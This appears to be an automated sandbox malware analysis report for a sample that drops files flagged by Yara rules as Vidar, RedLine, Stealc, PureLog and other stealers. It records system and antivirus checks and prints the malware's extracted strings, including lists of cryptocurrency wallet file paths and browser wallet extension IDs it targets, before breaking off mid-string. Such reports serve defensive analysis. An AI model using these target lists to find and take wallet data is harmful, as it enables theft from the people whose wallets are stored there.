Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_004143C0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

2_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_004144B0

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_6BC88390 NSS_GetVersion,

2_2_6BC88390

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217294b49f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2172952eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2450353895.0000021713EAB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2874374264.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2614325718.0000000005B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2871918307.0000000001202000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5564, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|MetaMask\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|TronLink\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|Binance Wallet\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|0\|0\|Yoroi\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase Wallet extension\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|0\|Jaxx Liberty\|cjelfplplebdjjenllpjcblmjkfcffne\|1\|0\|0\|iWallet\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|MEW CX\|nlbmnnijcnlegkjjpcfjclmcfggfefdm\|1\|0\|0\|GuildWallet\|nanjmdknhkinifnkgdcggcfnhdaammmj\|1\|0\|0\|Ronin 